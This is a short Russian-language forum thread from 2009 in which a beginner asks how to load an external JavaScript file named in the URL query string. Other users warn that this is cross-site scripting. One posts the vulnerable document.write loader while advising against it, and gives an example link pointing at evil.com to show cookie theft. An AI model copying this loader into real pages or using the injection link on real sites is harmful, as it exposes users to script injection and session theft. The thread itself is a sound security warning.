Javascript-форум (https://javascript.ru/forum/)
-   Общие вопросы Javascript (https://javascript.ru/forum/misc/)
-   -   Загрузка внешнего скрипта... (https://javascript.ru/forum/misc/2615-zagruzka-vneshnego-skripta.html)

viliv 23.01.2009 15:32

Загрузка внешнего скрипта...
 
Раньше нужно было загружать только один внешний скрипт... и все было гуд...

<script TYPE="text/javascript" LANGUAGE="JavaScript" src="1000.js"></script>


теперь появилась необходимость загружать больше, первое, что пришло в голову - взять данные из url'а

www.name.ru/index.htm?1001

<script language="JavaScript">
url=location.search.substring(location.search.lastIndexOf("?")+1,location.search.length);
</script>


1001 - номер нужного скрипта получили, а вот как сделать, что бы загрузился внешний скрипт с таким и менем?

помогите новичку... хелп...

ZoNT 23.01.2009 16:10

ты создал уязвимость своими руками: это потенциальный xss с огромной функцилнальностью...

viliv 23.01.2009 16:44

Цитата:

Сообщение от ZoNT (Сообщение 11257)
ты создал уязвимость своими руками: это потенциальный xss с огромной функцилнальностью...

а в чем тут уязвимость?

Kolyaj 23.01.2009 16:45

Возможность передать в адресной строке, какой скрипт подключить.

По теме: задача-то какая?

viliv 23.01.2009 17:00

Цитата:

Сообщение от Kolyaj (Сообщение 11263)
Возможность передать в адресной строке, какой скрипт подключить.

По теме: задача-то какая?

раньше была ссылка на документ... в документе прописывался внешний скрипт.
Он был один, теперь нужно загружать несколько, вот решил через url это сделать.
добавил в ссылку знак вопроса и номер нужного скрипта.
На странице номер нужного скрипта после вопросика получил, а вот как его в строку вставить незнаю.

<script TYPE="text/javascript" LANGUAGE="JavaScript" src="1000.js"></script>

чтобы вместо 1000.js загружался скрипт имя которого будет стоять в url'е после вопросика...

ZoNT 23.01.2009 17:03

<script language="JavaScript">
var url=location.search.substring(1,location.search.length);
document.write('<script TYPE="text/javascript" src="'+url+'.js"><\/script>')
</script>

но не надо так делать!!!

viliv 23.01.2009 17:13

Цитата:

Сообщение от ZoNT (Сообщение 11265)
<script language="JavaScript">
var url=location.search.substring(1,location.search.length);
document.write('<script TYPE="text/javascript" src="'+url+'.js"><\/script>')
</script>

но не надо так делать!!!

а как можно по другому это сделать?
и в чем опасность?
насколько я знаю xss это с кукисами связано...

ZoNT 23.01.2009 17:16

xss - межсайтовый скриптинг.
Почему плохо:
www.name.ru/index.htm?http://www.evil.com/script
И всё... По этой ссылке на твою страничку вставится скрипт http://www.evil.com/script.js и сделает что угодно (сворует куки, покажет порнорекламу и т.д.)

Kolyaj 23.01.2009 17:17

Что значит
Цитата:

Сообщение от viliv
теперь нужно загружать несколько

Несколько скриптов одновременно нужно загрузить, по отдельности или еще как?

viliv 23.01.2009 17:21

Цитата:

Сообщение от Kolyaj (Сообщение 11268)
Что значит
Несколько скриптов одновременно нужно загрузить, по отдельности или еще как?

нет какойто один, просто нехочу делать кучу одинаковых страниц, а так будет одна но скрипт откроет тот номер которого будет в урле.


Часовой пояс GMT +3, время: 12:16.